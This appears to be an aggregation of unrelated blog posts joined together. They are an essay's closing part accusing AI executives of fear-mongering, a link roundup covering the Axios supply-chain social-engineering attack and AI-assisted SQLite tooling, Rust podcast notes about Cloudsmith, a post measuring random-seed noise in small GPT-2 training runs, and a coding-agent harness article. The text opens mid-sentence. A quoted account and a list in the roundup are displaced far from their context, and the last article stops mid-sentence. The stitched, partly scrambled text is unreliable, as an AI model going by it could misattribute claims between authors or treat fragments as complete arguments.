“use AI” properly and will be “ at a huge disadvantage " despite the sales pitch being “this is intelligent software that just does stuff.”  AI companies can get as much attention as they need, their failings explained away, their meager successes celebrated like the ball dropping on New Years Eve, their half-assed sub-War Of The Worlds “Mythos” horseshit treated like they’ve opened the gates of Hell .  Regular people feel ignored and like they’re not taken seriously, and the people being given the most money and attention are the ones loudly saying “we’re richer than anyone has ever been, we intend to spend more than anyone has ever spent, and we intend to take your job.”  Why are they surprised that somebody mentally unstable took them seriously? Did they not think that people would be angry? Constantly talking about how your company will make an indeterminate amount of people jobless while also being able to raise over $162 billion in the space of two years and taking up as much space on Earth as you please is something that could send somebody over the edge.  Every day the news reminds you that everything sucks and is more expensive unless you’re in AI, where you’ll be given as much money and told you’re the most special person alive. I can imagine it tearing at a person’s soul as the world beats them down. What they did was a disgraceful act of violence.  Unstable people in various stages of torment act in erratic and dangerous ways. The suspect in the molotov cocktail incident apparently had a manifesto where he had listed the names and addresses of both Altman and multiple other AI executives, and, per CNBC, discussed the threat of AI to humanity as a justification for his actions. I am genuinely happy to hear that this person was apprehended without anyone being hurt.  These actions are morally wrong, and are also the direct result of the AI industry’s deceptive and manipulative scare campaign, one promoted by men like Altman and Amodei, as well as doomer fanfiction writers like Yudowsky, and, of course, Daniel Kokotajlo of AI 2027 — both of whom have had their work validated and propagated via the New York Times.  On the subject of “dangerous rhetoric,” I think we need to reckon with the fact that the mainstream media has helped spread harmful propaganda, and that a lack of scrutiny of said propaganda is causing genuine harm.  I also do not hear any attempts by Mr. Altman to deal with the actual, documented threat of AI psychosis, and the people that have been twisted by Large Language Models to take their lives and those of others . These are acts of violence that could have been stopped had ChatGPT and similar applications not been anthropomorphized by design, and trained to be “friendly.”  These dangerous acts of violence were not inspired by Ronan Farrow publishing a piece about Sam Altman. They were caused by a years-long publicity campaign that has, since the beginning, been about how scary the technology is and how much money its owners make.  I separately believe that these executives and their cohort are intentionally scaring people as a means of growing their companies, and that these continual statements of “we’re making something to take your job and we need more money and space to do it” could be construed as a threat by somebody that’s already on edge.  I agree that the dangerous rhetoric around AI must stop. Dario Amodei and Sam Altman must immediately cease their manipulative and disingenuous scare-tactics, and begin describing Large Language Models in terms that match their actual abilities, all while dispensing with any further attempts to extrapolate their future capabilities. Enough with the fluff. Enough with the bullshit. Stop talking about AGI. Start talking about this like regular old software, because that’s all that ChatGPT is.  In the end, if Altman wants to engage with “good-faith criticism,” he should start acting in good faith. That starts with taking ownership of his role in a global disinformation campaign. It starts with recognizing how the AI industry has sold itself based on spreading mythology with the intent of creating unrest and fear.  And it starts with Altman and his ilk accepting any kind of responsibility for their actions. I’m not holding my breath. As if their ability to try to do some of a task allows them to do the entire task.   As if their ability to do tasks is somehow impressive or a justification for their cost. An excuse for why they cannot do more hinged on something happening in the future.

0 views
Martin Fowler 6 days ago

Fragments: April 9

I mostly link to written material here, but I’ve recently listened to two excellent podcasts that I can recommend. Anyone who regularly reads these fragments knows that I’m a big fan of Simon Willison, his (also very fragmentary) posts have earned a regular spot in my RSS reader. But the problem with fragments, however valuable, is that they don’t provide a cohesive overview of the situation. So his podcast with Lenny Rachitsky is a welcome survey of that state of world as seen through a discerning pair of eyeballs. He paints a good picture of how programming has changed for him since the “November inflection point”, important patterns for this work, and his concern about the security bomb nestled inside the beast. My other great listening was on a regular podcast that I listen to, as Gergely Orosz interviewed Thuan Pham - the former CTO of Uber. As with so many of Gergely’s podcasts, they focused on Thuan Pham’s fascinating career direction, giving listeners an opportunity to learn from a successful professional. There’s also an informative insight into Uber’s use of microservices (they had 5000 of them), and the way high-growth software necessarily gets rewritten a lot (a phenomenon I dubbed Sacrificial Architecture ) ❄                ❄                ❄                ❄                ❄ Axios published their post-mortem on their recent supply chain compromise . It’s quite a story, the attackers spent a couple of weeks developing contact with the lead maintainer, leading to a video call where the meeting software indicated something on the maintainer’s system was out of date. That led to the maintainer installing the update, which in fact was a Remote Access Trojan (RAT). they tailored this process specifically to me by doing the following: Simon Willison has a summary and further links . ❄                ❄                ❄                ❄                ❄ I recently bumped into Diátaxis , a framework for organizing technical documentation. I only looked at it briefly, but there’s much to like. In particular I appreciated how it classified four forms of documentation: The distinction between tutorials and how-to guides is interesting A tutorial serves the needs of the user who is at study. Its obligation is to provide a successful learning experience. A how-to guide serves the needs of the user who is at work. Its obligation is to help the user accomplish a task. I also appreciated its point of pulling explanations out into separate areas. The idea is that other forms should contain only minimal explanations, linking to the explanation material for more depth. That way we keep the flow on the goal and allow the user to seek deeper explanations in their own way. The study/work distinction between explanation and reference mirrors that same distinction between tutorials and how-to guides. ❄                ❄                ❄                ❄                ❄ For eight years, Lalit Maganti wanted a set of tools for working with SQLite. But it would be hard and tedious work, “getting into the weeds of SQLite source code, a fiendishly difficult codebase to understand”. So he didn’t try it. But after the November inflection point , he decided to tackle this need. His account of this exercise is an excellent description of the benefits and perils of developing with AI agents. Through most of January, I iterated, acting as semi-technical manager and delegating almost all the design and all the implementation to Claude. Functionally, I ended up in a reasonable place: a parser in C extracted from SQLite sources using a bunch of Python scripts, a formatter built on top, support for both the SQLite language and the PerfettoSQL extensions, all exposed in a web playground. But when I reviewed the codebase in detail in late January, the downside was obvious: the codebase was complete spaghetti. I didn’t understand large parts of the Python source extraction pipeline, functions were scattered in random files without a clear shape, and a few files had grown to several thousand lines. It was extremely fragile; it solved the immediate problem but it was never going to cope with my larger vision, never mind integrating it into the Perfetto tools. The saving grace was that it had proved the approach was viable and generated more than 500 tests, many of which I felt I could reuse. He threw it all away and worked more closely with the AI on the second attempt, with lots of thinking about the design, reviewing all the code, and refactoring with every step In the rewrite, refactoring became the core of my workflow. After every large batch of generated code, I’d step back and ask “is this ugly?” Sometimes AI could clean it up. Other times there was a large-scale abstraction that AI couldn’t see but I could; I’d give it the direction and let it execute. If you have taste, the cost of a wrong approach drops dramatically because you can restructure quickly. He ended up with a working system, and the AI proved its value in allowing him to tackle something that he’d been leaving on the todo pile for years. But even with the rewrite, the AI had its potholes. His conclusion of the relative value of AI in different scenarios: When I was working on something I already understood deeply, AI was excellent…. When I was working on something I could describe but didn’t yet know, AI was good but required more care…. When I was working on something where I didn’t even know what I wanted, AI was somewhere between unhelpful and harmful… At the heart of this is that AI works at its best when there is an objectively checkable answer. If we want an implementation that can pass some tests, then AI does a good job. But when it came to the public API: I spent several days in early March doing nothing but API refactoring, manually fixing things any experienced engineer would have instinctively avoided but AI made a total mess of. There’s no test or objective metric for “is this API pleasant to use” and “will this API help users solve the problems they have” and that’s exactly why the coding agents did so badly at it. ❄                ❄                ❄                ❄                ❄ I became familiar with Ryan Avent’s writing when he wrote the Free Exchange column for The Economist. His recent post talks about how James Talarico and Zohran Mamdani have made their religion an important part of their electoral appeal, and their faith is centered on caring for others. He explains that a focus on care leads to an important perspective on economic growth. The first thing to understand is that we should not want growth for its own sake. What is good about growth is that it expands our collective capacities: we come to know more and we are able to do more. This, in turn, allows us to alleviate suffering, to discover more things about the universe, and to spend more time being complete people. they reached out masquerading as the founder of a company they had cloned the companys founders likeness as well as the company itself. they then invited me to a real slack workspace. this workspace was branded to the companies ci and named in a plausible manner. the slack was thought out very well, they had channels where they were sharing linked-in posts, the linked in posts i presume just went to the real companys account but it was super convincing etc. they even had what i presume were fake profiles of the team of the company but also number of other oss maintainers. they scheduled a meeting with me to connect. the meeting was on ms teams. the meeting had what seemed to be a group of people that were involved. the meeting said something on my system was out of date. i installed the missing item as i presumed it was something to do with teams, and this was the RAT. everything was extremely well co-ordinated looked legit and was done in a professional manner. Tutorials: to learn how to use the product How-to guides: for users to follow to achieve particular goals with the product Reference: to describe what the product does Explanations: background and context to educate the user on the product’s rationale

0 views
Corrode 1 weeks ago

Cloudsmith

Rust adoption can be loud, like when companies such as Microsoft, Meta, and Google announce their use of Rust in high-profile projects. But there are countless smaller teams quietly using Rust to solve real-world problems, sometimes even without noticing. This episode tells one such story. Cian and his team at Cloudsmith have been adopting Rust in their Python monolith not because they wanted to rewrite everything in Rust, but because Rust extensions were simply best-in-class for the specific performance problems they were trying to solve in their Django application. As they had these initial successes, they gained more confidence in Rust and started using it in more and more areas of their codebase. CodeCrafters helps you become proficient in Rust by building real-world, production-grade projects. Learn hands-on by creating your own shell, HTTP server, Redis, Kafka, Git, SQLite, or DNS service from scratch. Start for free today and enjoy 40% off any paid plan by using this link . Made with love in Belfast and trusted around the world. Cloudsmith is the fully-managed solution for controlling, securing, and distributing software artifacts. They analyze every package, container, and ML model in an organization’s supply chain, allow blocking bad packages before they reach developers, and build an ironclad chain of custody. Cian is a Service Reliability Engineer located in Dublin, Ireland. He has been working with Rust for 10 years and has a history of helping companies build reliable and efficient software. He has a BA in Computer Programming from Dublin City University. Lee Skillen’s blog - The blog of Lee Skillen, Cloudsmith’s co-founder and CTO Django - Python on Rails Django Mixins - Great for scaling up, not great for long-term maintenance SBOM - Software Bill of Materials Microservice vs Monolith - Martin Fowler’s canonical explanation Jaeger - “Debugger” for microservices PyO3 - Rust-to-Python and Python-to-Rust FFI crate orjson - Pretty fast JSON handling in Python using Rust drf-orjson-renderer - Simple orjson wrapper for Django REST Framework Rust in Python cryptography - Parsing complex data formats is just safer in Rust! jsonschema-py - jsonschema in Python with Rust, mentioned in the PyO3 docs WSGI - Python’s standard for HTTP server interfaces uWSGI - A application server providing a WSGI interface rustimport - Simply import Rust files as modules in Python, great for prototyping granian - WSGI application server written in Rust with tokio and hyper hyper - HTTP parsing and serialization library for Rust HAProxy - Feature rich reverse proxy with good request queue support nginx - Very common reverse proxy with very nice and readable config locust - Fantastic load-test tool with configuration in Python goose - Locust, but in Rust Podman - Daemonless container engine Docker - Container platform buildx - Docker CLI plugin for extended build capabilities with BuildKit OrbStack - Faster Docker for Desktop alternative Rust in Production: curl with Daniel Stenberg - Talking about hyper’s strictness being at odds with curl’s permissive design axum - Ergonomic and modular web framework for Rust rocket - Web framework for Rust Cloudsmith Website Cian Butler’s Website Cian’s E-Mail

0 views
Giles's blog 1 weeks ago

Writing an LLM from scratch, part 32i -- Interventions: what is in the noise?

Towards the end of last year, I trained a 163M-parameter GPT-2-style model from scratch on my local RTX 3090 , using code based on Sebastian Raschka 's book " Build a Large Language Model (from Scratch) ". The result was a pretty decent little model, but it wasn't as good as the original GPT-2-small, despite having more parameters (because it wasn't using weight-tying). Specifically: on a particular test set, my model gave a loss of 3.944 -- quite a lot more than the original GPT-2's 3.500 on the same dataset. I wanted to see whether I could train a model on my own hardware (or on something that didn't cost too much to rent in the cloud) that got closer to the original model's performance. So over the last few months, I've done a bunch of further training runs, each one testing a specific intervention -- a stand-alone change that I expected to change the loss, either for better or for worse. Specifically: At the end of all of that, I had this table showing the effect of each intervention in terms of loss on the test set. They're sorted from least-effective to most-effective, and you can see the baseline in there too: Winners and losers are reasonably clear: So, for an optimal train, we'd just use the effective interventions, right? Well, not quite. Full-fat float32 I decided wasn't worth the effort, as it meant that the train took more than twice as long, and (because it required a larger machine), cost more than three times as much. The others did look like solid changes, but there was one concern. The effect of each intervention is actually pretty small. For example, gradient clipping reduced the loss by 0.014, from 3.692 to 3.678. That's a 0.3% improvement. Even the best intervention, scheduling the learning rate, only improved things by 2%. Could it be that some or all of these improvements were not real, but just a result of the random nature of training deep neural networks? Could the differences just be in the noise? They seemed small enough for that to be possible. I've trained seven more models over the last few days to try to get a feel as to how big an effect noise has for this kind of training run. The results appear to show that variations in the initial weights matter quite a lot, but randomness in the training loop (given the same initial weights) actually has a fairly minimal impact. That surprised me a bit! Let's go through the details. When I did the original baseline training run -- creating the model that was the comparison point for all of the interventions -- I wanted to minimise the amount of random number-induced differences between the training runs in this interventions series. I did this by setting the random seed at the start -- specifically, I had this code: At the time I wrote it, this seemed pretty complete -- the seed is set on Python's own random number generator, on PyTorch's, and on the separate ones it uses for CUDA. However, in a separate project, where I was fine-tuning a Qwen model as a classifier, I'd found that this wasn't enough. In order to get full reproducibility, I'd had to lock things down a bit more, with this additional code: So: was my random number seed code enough for this case? Or would I get a different model if I ran the same code a second time? That was easy enough to do; I spun up a machine, and just ran the "baseline" train again. 3 hours 24 minutes later: Interestingly, that was exactly the same final train loss as the original baseline train. Here's the model . I ran my normal smoke test, asking it to complete "Every effort moves you" ...so that was OK -- the model was generating reasonably coherent text. Then I ran the eval to find its loss on the test set: Exactly the same as the original baseline! That was certainly promising. Now, the use of three decimal places for the output from the loss eval is just a formatting thing, so I bumped it up to 6 dps, and the new model got this: Running that against the original baseline model: Again, exactly the same. Finally, more out of idle interest than anything else, I decided to see if the models were at least different: That is, quite frankly, amazing to me. I was expecting pretty close results, but what we're seeing here is that two separate models, trained on the same data, but on different machines more than a month apart, have weights that are bit-wise identical. No random noise at all. That's actually really reassuring! It makes me much more comfortable that we're standing on a stable foundation here. Now it was time to see what effect changing that random seed would have. Let's think about what the random seed does. When we call , we're initialising Python's pseudo-random number generator so that it will start at a particular point -- after we've called it, it will generate the same sequence of "random" numbers each time it's asked for a new one. So the effect of this code: ...is to initialise three separate pseudo-random number generators to be in a known deterministic state, so they'll all generate the same sequence in every run. So, the first thing to do was to see what happened if we changed that number. I decided to do two training runs, each with exactly the same code as the baseline, but with different random seeds. Firstly, I changed it from 42 to 22 1 : That training run completed: Here's the model . Time for the evals; the smoke test: ...and the loss test: So, that's 3.673453 compared to 3.691526, an improvement of 0.018 over the run with a seed of 42. That's more than the 0.014 improvement we got from gradient clipping (and indeed, the 0.013 from full-fat float32 training), and quite close to the 0.023 improvement from adding attention weight bias. Time for another training run: Another 3h24m later: Here's the model . The smoke test: ...and the test set loss: A further improvement! That's 0.038 better than our original baseline, which beats adding on attention weight bias (though it's worse than the weight decay update). Now, three data points is rather a small number for any kind of statistical analysis, but just out of interest, let's do the basics. GeeksForGeeks has a good refresher here if you're a bit rusty. Firstly, our mean is ...and our variance 2 is: If we take the square root of that, we get the standard deviation (SD): So, if we assume a normal distribution, what would that say about our results? Here's the results table again. If we assume that the results are on a normal distribution: That seemed a bit saddening -- were all of the results apart from scheduling the learning rate within the noise? Well, so as I said, three data points is too small a number to take those results without a fistful of salt. I was thinking of perhaps trying another few random seeds to see what would happen, and perhaps to tighten those numbers up a bit, but then something occurred to me -- randomness was being used in two different ways in the training run, and perhaps we could separate them? Where do we use the random numbers? Well, immediately after we set the seeds, we create our uninitialised model for training: One of the random number generators -- Python's, PyTorch's, or one of the CUDA ones -- will be used to generate the initial weights that we're going to start training. That means that for the same model setup , we'll always start with exactly the same weights. But if the model settings change such that we initialise different things in a different order, then we'll have different weights. After we've done that, we go into the training loop. That can have randomness in it; although the AdamW optimiser itself is deterministic, we are (in all but one of these training runs) using dropout, which drops a random bunch of activations at various points -- 10% of them with our config. And it seems entirely possible that each of the interventions could change the order of execution of different steps in non-obvious ways, which would lead to dropout being applied in different ways in different runs. So, the question was: what kinds of randomness -- in terms of the initial weights, or in terms of the training run -- did each intervention potentially change vs the baseline? Disregarding the full-fat float32 run: Given that, I wanted to get two measures of how sensitive to noise each phase of the training run was: the initialisation of weights at the start, and the training run itself. I decided to start by nailing down exactly what the training run started with. We already had a baseline training run with a specific state of the random number generator at the start; in our "real" baseline, we seeded with 42 at the start, and then initialised our weights. After that, the random number generator would have reached some specific state based on its initial seed and how many numbers had been generated so far. Now, in theory, we could get the RNG into that specific state by seeding it with some number A at that point. We don't know what A is, of course. But it seems vanishingly unlikely that it would be something we'd come up with -- specifically, we can be pretty sure that A ≠ 23 and A ≠ 67 . So, I put the old initial seed of 42 back in, but re-seeded after the model had been initialised: Firstly, with a re-seed value of 23: I let that run.... ...and got this model . Time for the normal evals: Next, I did another training run, the same as the previous one, but with 67 instead of 23 for the re-seed: That one ran: ...producing this model , which eval'ed like this 3 : Let's bring those together: That's a mean of ~3.684462, with a variance of ~0.0000752 and a standard deviation of ~0.008672. Those are tiny compared to the numbers from the two trains we did with the change of the seed prior to the model initialisation. That actually surprised me a bit; we're using dropout in all of these training runs, and it's dropping a random 10% of activations in every forward training pass. With our different training run starting seeds, they should be getting very different dropout patterns. Hand-wavingly, perhaps over the three million or so sequences we're training on, it averages out? Still a little counterintuitive, though. Anyway, let's take a look at the intervention results again, this time highlighting the ones that we believe will be starting with the same weights: Using the "99.7% should be within three SDs" heuristic, we get a range of 3.658446 - 3.710478. Of the intervention runs with (I believe) stable weights, only the no-AMP and the gradient clipping ones are within that range. That made me feel quite positive. If my beliefs are correct about which runs have the same weights, then noise in the training runs seems unlikely to be causing the differences -- that is, perhaps the results from the interventions for those same-weight training runs are real signal and not just noise. What would happen if instead of pinning the seed for generating the weights and varying the starting seed for the training run, we varied the weight seed and pinned the training one? We'd already done a training run with a seed of 42 before generating the weights and a re-seed to 23 after that: So I decided to see what would happen if I varied the pre-weights initialisation seed. Let that train: ...getting this model . Evals: Next, one with 67 as the weights initialisation seed: That trained: ...getting this model , and 4 : OK, so here we have: Compared to the SD we got when we varied just the initial seed, 0.0154919, it's not too far off. Using the 3-SD rule, we get a range of 3.637030 - 3.709400, and looking at the table again, this time with the ones that we don't expect to have the same weights highlighted: ...we can see that the QKV bias is well within that range (as are all of the interventions apart from the two negative-effect ones and scheduling the learning rate). Right, what does all of that tell us? This post obviously isn't even trying to be statistically rigorous. The number of training runs I've done and the amount of data is way too small for that. However, training runs are expensive (Lambda have raised their prices again, so these cost more than US$50 each!), so there's a limit to how much I can do. But even with the limited amount of data, something seems pretty clear: "One of these things is not like the others". Keeping the model weights stable and only allowing variation in randomness across the training run itself meant that almost all of the differences between training runs disappeared. Could this be a result of the small number of samples? I guess conceivably it might, but it seems vanishingly unlikely. So I feel reasonably confident in saying that the bulk of the variation in results that we can chalk up to random noise in these training runs comes from variations in the model weights' initialisation. Additionally, the first training run in this post -- the re-run of the baseline model with no changes -- gave exactly the same numbers as the original baseline run. So we can be confident that all of the models with no changes to the weight initialisation started with the same weights. Of course, I could be wrong about which models really did have the same weights, but given that they were running the same code with the same seed, I'm pretty much sure. That makes me fairly confident that the intervention runs that had the same initial weights gave a real signal about whether or not the intervention in question actually helped. The only exception is gradient clipping, which fell within the three-SD range for the same-weights tests -- and it's essentially free, adding just 100 seconds to a three hour training run. That's a really interesting result! As I said earlier, given that dropout is making us ignore a random 10% of activations during the training run, I would have thought that changing which random 10% were being ignored would have a much larger effect. And that's not even considering other sources of random noise in the training run. I was less surprised that model weight initialisation was important, though. It's pretty obvious that your starting position in the loss landscape is going to affect where you end up at the end of the training run. Still, we now have a reasonable level of trust that our interventions gave a real signal, so I think we have everything in place to see how they stack together, and do a best-effort training run. Can we approach the original GPT-2 small weights' performance on our test set loss? It should be fun to find out :-) Numbers chosen based on a misremembering of this XKCD . For some reason (perhaps because it rhymes) I thought that the old-timey funny number thing was "22 skidoo" rather than "23 skidoo".  ↩ On working through this later: with n samples from a dataset, it is (as I understand it) best to use n − 1 as the denominator here (Bessel's correction) for the "sample variance". If we had every possible value, then it would be correct to use n . However, while this changes a few details in the analysis, I don't think it changes the final conclusion of the post meaningfully (it would just bump up the SDs by 22% or so), so I've left it as-is.  ↩ I found it interesting that this model does the "you and I" hypercorrection that so many people do when trying to write formally! Based on the (correct) correction of "me and you move back home" to "you and I move back home", I think as a result of excessive pattern-matching.  ↩ Another grammatical error based on pattern-matching -- it would make sense that the possessive form of "it" in English was "it's", just like the possessive form of "John" is "John's".  ↩ I trained a baseline model on an 8x A100 40 GiB per GPU machine on Lambda (which was better than my original locally-trained model, I believe due to the larger batch size that the larger machine made possible). I tried adding gradient clipping to see if that would help by limiting the effects of loss spikes. I tried removing dropout , given that these days people tend not to use it (because we're doing single-epoch training runs). I tried adding bias to the attention weight matrices -- something that was popular back in the GPT-2 era, and was used by the original weights, but which my code did not use. Instead of just using the learning rate of 0.0004 that was used in the code from the book, I looked into what values people use these days, and learned how to schedule it over the course of the training run . Similarly, I learned more about weight decay and tried some alternative values. Then I tried making my model more like the original GPT-2 one by introducing weight tying to see if that would help. Finally, I decided to try training in "full-fat" float32 instead of using PyTorch's AMP and TF32 matrix multiplication performance enhancements. Weight tying and the number for weight decay I derived from a paper by Cerebras Research (probably without understanding it properly) were negatives. Full-fat float32, gradient clipping, attention biases, the GPT-2 weight decay parameter, removing dropout, and scheduling (and updating) the learning rate were positives. We would expect ~68.2% of results to be within one SD of the mean -- that is, between 3.6573651 and 3.6883489. Interestingly, our actual baseline result is outside that range! But it does include both the gradient clipping and the QKV bias results. We would additionally expect ~95.4% of the results to be within two SDs, which is 3.6418732 to 3.7038408. That includes our baseline and our weight decay result (though not our experiment removing dropout -- the six-DP loss number for that is 3.641282). Finally, we'd expect ~99.7% of results to be within three SDs, which is a range from 3.6263813 to 3.7193327. That covers all of our positive results apart from scheduling learning rate! Gradient clipping: randomness only affected the training run -- the weights it started with would have been exactly the same as the baseline model's. Removing dropout: although this is a parameter on the model, I don't think it changes the initial weights. But in the training run, it certainly does affect randomness by removing its use of the random number generator. Adding bias to the attention weights. This will change both the initial weights -- because we have those bias weights, things will be initialised differently -- and as a result, the training run, as the random number generator will have been sampled a different number of times prior to the run. Changing and scheduling the learning rate certainly should not change the initial weights, but it might conceivably have a non-obvious effect on training. Likewise weight decay; no effect I can see on the initial weights, but it could well change training dynamics. Weight-tying. When I added it to the code , I tried to do so in such a way that the other weights would be unaffected -- I created exactly the same weights as I would without weight tying, then threw away the output head and replaced it with a reference to the input embedding weights. So I think that in theory, this one won't have changed the other model weights (apart from ignoring the initialised-but-thrown-away output head), but it could well have changed the training run. Our normal baseline: weights initialised with seed 42, and training run starts with a "seed" of our imaginary A value from above: 3.691526 The first run above: weights initialised with seed 42, and training run starts with a seed of 23: 3.681356 The second run above: weights initialised with seed 42, and training run starts with a seed of 67: 3.680505 The first run above: weights initialised with seed 42, and training run starts with a seed of 23: 3.681356 Mean: ~3.673215 Variance: ~0.000145 SD: ~0.012062 Varying the random seed at the start, prior to initialising weights, and not constraining the starting point for the training runs, gave a mean of 3.672857, with an SD of 0.0154919. Keeping the same seed for model weights (so that they all started with the same weights), and varying the seed for the training run, gave a mean of 3.684462, with an SD of 0.008672. Varying the seed for the model weights (so that they all started with different weights), and keeping the training run seed pinned, gave a mean of 3.673215 and an SD of 0.012062. Numbers chosen based on a misremembering of this XKCD . For some reason (perhaps because it rhymes) I thought that the old-timey funny number thing was "22 skidoo" rather than "23 skidoo".  ↩ On working through this later: with n samples from a dataset, it is (as I understand it) best to use n − 1 as the denominator here (Bessel's correction) for the "sample variance". If we had every possible value, then it would be correct to use n . However, while this changes a few details in the analysis, I don't think it changes the final conclusion of the post meaningfully (it would just bump up the SDs by 22% or so), so I've left it as-is.  ↩ I found it interesting that this model does the "you and I" hypercorrection that so many people do when trying to write formally! Based on the (correct) correction of "me and you move back home" to "you and I move back home", I think as a result of excessive pattern-matching.  ↩ Another grammatical error based on pattern-matching -- it would make sense that the possessive form of "it" in English was "it's", just like the possessive form of "John" is "John's".  ↩

0 views
Ahead of AI 1 weeks ago

Components of A Coding Agent

In this article, I want to cover the overall design of coding agents and agent harnesses: what they are, how they work, and how the different pieces fit together in practice. Readers of my Build a Large Language Model (From Scratch) and Build a Large Reasoning Model (From Scratch) books often ask about agents, so I thought it would be useful to write a reference I can point to. More generally, agents have become an important topic because much of the recent progress in practical LLM systems is not just about better models, but about how we use them. In many real-world applications, the surrounding system, such as tool use, context management, and memory, plays as much of a role as the model itself. This also helps explain why systems like Claude Code or Codex can feel significantly more capable than the same models used in a plain chat interface. In this article, I lay out six of the main building blocks of a coding agent. You are probably familiar with Claude Code or the Codex CLI, but just to set the stage, they are essentially agentic coding tools that wrap an LLM in an application layer, a so-called agentic harness, to be more convenient and better-performing for coding tasks. Figure 1: Claude Code CLI, Codex CLI, and my Mini Coding Agent . Coding agents are engineered for software work where the notable parts are not only the model choice but the surrounding system, including repo context, tool design, prompt-cache stability, memory, and long-session continuity. That distinction matters because when we talk about the coding capabilities of LLMs, people often collapse the model, the reasoning behavior, and the agent product into one thing. But before getting into the coding agent specifics, let me briefly provide a bit more context on the difference between the broader concepts, the LLMs, reasoning models, and agents. An LLM is the core next-token model. A reasoning model is still an LLM, but usually one that was trained and/or prompted to spend more inference-time compute on intermediate reasoning, verification, or search over candidate answers. An agent is a layer on top, which can be understood as a control loop around the model. Typically, given a goal, the agent layer (or harness) decides what to inspect next, which tools to call, how to update its state, and when to stop, etc. Roughly, we can think about the relationship as this: the LLM is the engine, a reasoning model is a beefed-up engine (more powerful, but more expensive to use), and an agent harness helps us the model. The analogy is not perfect, because we can also use conventional and reasoning LLMs as standalone models (in a chat UI or Python session), but I hope it conveys the main point. Figure 2: The relationship between conventional LLM, reasoning LLM (or reasoning model), and an LLM wrapped in an agent harness. In other words, the agent is the system that repeatedly calls the model inside an environment. So, in short, we can summarize it like this: LLM: the raw model Reasoning model : an LLM optimized to output intermediate reasoning traces and to verify itself more Agent: a loop that uses a model plus tools, memory, and environment feedback Agent harness: the software scaffold around an agent that manages context, tool use, prompts, state, and control flow Coding harness: a special case of an agent harness; i.e., a task-specific harness for software engineering that manages code context, tools, execution, and iterative feedback As listed above, in the context of agents and coding tools, we also have the two popular terms agent harness and (agentic) coding harness . A coding harness is the software scaffold around a model that helps it write and edit code effectively. And an agent harness is a bit broader and not specific to coding (e.g., think of OpenClaw). Codex and Claude Code can be considered coding harnesses. Anyways, A better LLM provides a better foundation for a reasoning model (which involves additional training), and a harness gets more out of this reasoning model. Sure, LLMs and reasoning models are also capable of solving coding tasks by themselves (without a harness), but coding work is only partly about next-token generation. A lot of it is about repo navigation, search, function lookup, diff application, test execution, error inspection, and keeping all the relevant information in context. (Coders may know that this is hard mental work, which is why we don’t like to be disrupted during coding sessions :)). Figure 3. A coding harness combines three layers: the model family, an agent loop, and runtime supports. The model provides the “engine”, the agent loop drives iterative problem solving, and the runtime supports provide the plumbing. Within the loop, “observe” collects information from the environment, “inspect” analyzes that information, “choose” selects the next step, and “act” executes it. The takeaway here is that a good coding harness can make a reasoning and a non-reasoning model feel much stronger than it does in a plain chat box, because it helps with context management and more. As mentioned in the previous section, when we say harness , we typically mean the software layer around the model that assembles prompts, exposes tools, tracks file state, applies edits, runs commands, manages permissions, caches stable prefixes, stores memory, and many more. Today, when using LLMs, this layer shapes most of the user experience compared to prompting the model directly or using web chat UI (which is closer to “chat with uploaded files”). Since, in my view, the vanilla versions of LLMs nowadays have very similar capabilities (e.g., the vanilla versions of GPT-5.4, Opus 4.6, and GLM-5 or so), the harness can often be the distinguishing factor that makes one LLM work better than another. This is speculative, but I suspect that if we dropped one of the latest, most capable open-weight LLMs, such as GLM-5, into a similar harness, it could likely perform on par with GPT-5.4 in Codex or Claude Opus 4.6 in Claude Code. That said, some harness-specific post-training is usually beneficial. For example, OpenAI historically maintained separate GPT-5.3 and GPT-5.3-Codex variants. In the next section, I want to go more into the specifics and discuss the core components of a coding harness using my Mini Coding Agent : https://github.com/rasbt/mini-coding-agent . Figure 4: Main harness features of a coding agent / coding harness that will be discussed in the following sections. By the way, in this article, I use the terms “coding agent” and “coding harness” somewhat interchangeably for simplicity. (Strictly speaking, the agent is the model-driven decision-making loop, while the harness is the surrounding software scaffold that provides context, tools, and execution support.) Figure 5: Minimal but fully working, from-scratch Mini Coding Agent (implemented in pure Python) Anyways, below are six main components of coding agents. You can check out the source code of my minimal but fully working, from-scratch Mini Coding Agent (implemented in pure Python), for more concrete code examples. The code annotates the six components discussed below via code comments: This is maybe the most obvious component, but it is also one of the most important ones. When a user says “fix the tests” or “implement xyz,” the model should know whether it is inside a Git repo, what branch it is on, which project documents might contain instructions, and so on. That’s because those details often change or affect what the correct action is. For example, “Fix the tests” is not a self-contained instruction. If the agent sees AGENTS.md or a project README, it may learn which test command to run, etc. If it knows the repo root and layout, it can look in the right places instead of guessing. Also, the git branch, status, and commits can help provide more context about what changes are currently in progress and where to focus. Figure 6: The agent harness first builds a small workspace summary that gets combined with the user request for additional project context. The takeaway is that the coding agent collects info (”stable facts” as a workspace summary) upfront before doing any work, so that it’s is not starting from zero, without context, on every prompt. Once the agent has a repo view, the next question is how to feed that information to the model. The previous figure showed a simplified view of this (“Combined prompt: prefix + request”), but in practice, it would be relatively wasteful to combine and re-process the workspace summary on every user query. I.e., coding sessions are repetitive, and the agent rules usually stay the same. The tool descriptions usually stay the same, too. And even the workspace summary usually stays (mostly) the same. The main changes are usually the latest user request, the recent transcript, and maybe the short-term memory. “Smart” runtimes don’t rebuild everything as one giant undifferentiated prompt on every turn, as illustrated in the figure below. Figure 7: The agent harness builds a stable prompt prefix, adds the changing session state, and then feeds that combined prompt to the model. The main difference from section 1 is that section 1 was about gathering repo facts. Here, we are now interested in packaging and caching those facts efficiently for repeated model calls. The “stable” “Stable prompt prefix” means that the information contained there doesn’t change too much. It usually contains the general instructions, tool descriptions, and the workspace summary. We don’t want to waste compute on rebuilding it from scratch in each interaction if nothing important has changed. The other components are updated more frequently (usually each turn). This includes short-term memory, the recent transcript, and the newest user request. In short, the caching aspect for the “Stable prompt prefix” is simply that a smart runtime tries to reuse that part. Tool access and tool use are where it starts to feel less like chat and more like an agent. A plain model can suggest commands in prose, but an LLM in a coding harness should do something narrower and more useful and be actually able to execute the command and retrieve the results (versus us calling the command manually and pasting the results back into the chat). But instead of letting the model improvise arbitrary syntax, the harness usually provides a pre-defined list of allowed and named tools with clear inputs and clear boundaries. (But of course, something like Python can be part of this so that the agent could also execute an arbitrary wide list of shell commands.) The tool-use flow is illustrated in the figure below. Figure 8: The model emits a structured action, the harness validates it, optionally asks for approval, executes it, and feeds the bounded result back into the loop. To illustrate this, below is an example of how this usually looks to the user using my Mini Coding Agent. (This is not as pretty as Claude Code or Codex because it is very minimal and uses plain Python without any external dependencies.) Figure 9: Illustration of a tool call approval request in the Mini Coding Agent. Here, the model has to choose an action that the harness recognizes, like list files, read a file, search, run a shell command, write a 